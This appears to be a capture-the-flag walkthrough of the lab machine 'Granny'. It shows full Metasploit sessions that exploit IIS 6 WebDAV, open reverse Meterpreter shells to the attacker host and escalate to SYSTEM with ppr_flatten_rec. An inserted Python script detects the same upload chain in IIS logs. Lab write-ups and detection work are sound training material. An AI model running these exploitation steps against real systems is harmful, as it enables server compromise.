As always, we start with an NMAP
root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 14:24 CEST
Nmap scan report for 10.10.10.15
Host is up (0.022s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Date: Fri, 18 Oct 2019 12:24:42 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.00 seconds
The only thing, and at the same time the most interesting one, is IIS 6.
I searched in searchsploit and Metasploit and got a million results.
Google recommends:
msf5 > use exploit/windows/iis/iis_webdav_upload_asp
msf5 exploit(windows/iis/iis_webdav_upload_asp) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Checking /metasploit262514588.asp
[*] Uploading 610960 bytes to /metasploit262514588.txt...
[*] Moving /metasploit262514588.txt to /metasploit262514588.asp...
[*] Executing /metasploit262514588.asp...
[*] Deleting /metasploit262514588.asp (this doesn't always work)...
[!] Deletion failed on /metasploit262514588.asp [403 Forbidden]
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.15:1030) at 2019-10-18 14:31:06 +0200

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 1724 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
And that is enough, but it is only a network service user…
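The module above leaves a very recognisable trail in the IIS W3C logs: a PUT of a .txt file, a MOVE of that same path, then a GET of the .asp with the same name, all from one client within seconds. As an added example (not part of the original post), this script hunts for that PUT -> MOVE -> GET chain over a constructed log sample; the field list in the #Fields header is assumed, since IIS only records the MOVE source path, not the Destination header.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of IIS W3C extended log lines (not taken from the original post).
# The field order is read from the #Fields header, exactly as IIS writes it.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-10-18 12:31:01 10.10.14.8 OPTIONS / 200
2019-10-18 12:31:02 10.10.14.8 PUT /metasploit262514588.txt 201
2019-10-18 12:31:03 10.10.14.8 MOVE /metasploit262514588.txt 201
2019-10-18 12:31:04 10.10.14.8 GET /metasploit262514588.asp 200
2019-10-18 12:31:05 10.10.14.8 DELETE /metasploit262514588.asp 403
2019-10-18 12:40:00 10.10.14.9 PUT /docs/notes.txt 201
2019-10-18 12:40:30 10.10.14.9 GET /docs/notes.txt 200
"""

# Extensions that IIS 6 hands to the ASP engine; a GET to one of these after a rename is the tell.
EXEC_EXT = (".asp", ".aspx", ".asa", ".cer", ".cdx")

def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def find_webdav_uploads(text, window=timedelta(minutes=5)):
    """Return (client, uploaded_path, executed_path) for every PUT followed, within
    `window` and from the same client, by a MOVE of the uploaded path and a GET of an
    executable file that shares the uploaded file's stem."""
    hits, by_client = [], defaultdict(list)
    for r in parse_w3c(text):
        r["ts"] = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
        by_client[r["c-ip"]].append(r)
    for client, rows in by_client.items():
        for put in (r for r in rows if r["cs-method"] == "PUT"):
            stem = put["cs-uri-stem"].rsplit(".", 1)[0]
            later = [r for r in rows if put["ts"] <= r["ts"] <= put["ts"] + window]
            moved = any(r["cs-method"] == "MOVE" and r["cs-uri-stem"] == put["cs-uri-stem"]
                        for r in later)
            for r in later:
                if (moved and r["cs-method"] == "GET"
                        and r["cs-uri-stem"].lower().endswith(EXEC_EXT)
                        and r["cs-uri-stem"].rsplit(".", 1)[0] == stem):
                    hits.append((client, put["cs-uri-stem"], r["cs-uri-stem"]))
                    break
    return hits

if __name__ == "__main__":
    for hit in find_webdav_uploads(SAMPLE_LOG):
        print("WebDAV upload/rename/execute chain:", hit)
```

The benign client that only PUTs and reads back a .txt is not reported, and the 403 on the DELETE, seen in the session above, is why the .asp often stays on disk for the responder to find.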
So we migrate to another process:
exit
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_upload_asp) > use post/windows/manage/migrate
msf5 post(windows/manage/migrate) > set session 1
session => 1
msf5 post(windows/manage/migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (824)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3164
[+] Successfully migrated to process 3164
[*] Post module execution completed
And we use the suggester
msf5 post(windows/manage/migrate) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
There are many; from here on we try them until we find an interesting one.
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf5 exploit(windows/local/ppr_flatten_rec) > options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/ppr_flatten_rec) > set session 1
session => 1
msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on 172.16.10.164:4444
[*] Launching notepad to host the exploit...
[+] Process 3952 launched.
[*] Reflectively injecting the exploit DLL into 3952...
[*] Injecting exploit into 3952 ...
[*] Exploit injected. Injecting payload into 3952...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ppr_flatten_rec) > ifconfig
[*] exec: ifconfig
There was one detail here: it is using an IP that is not the right one:
[*] Started reverse TCP handler on 172.16.10.164:4444
Options didn't show me much, so we have to use the advanced options.
Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/ppr_flatten_rec) >
With that, it works
msf5 exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 1244 launched.
[*] Reflectively injecting the exploit DLL into 1244...
[*] Injecting exploit into 1244 ...
[*] Exploit injected. Injecting payload into 1244...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.15:1031) at 2019-10-18 14:37:32 +0200

meterpreter > shell
Process 1732 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
And now we are admins 🙂
I liked it much more than Grandpa, and I've just got a new machine 🙂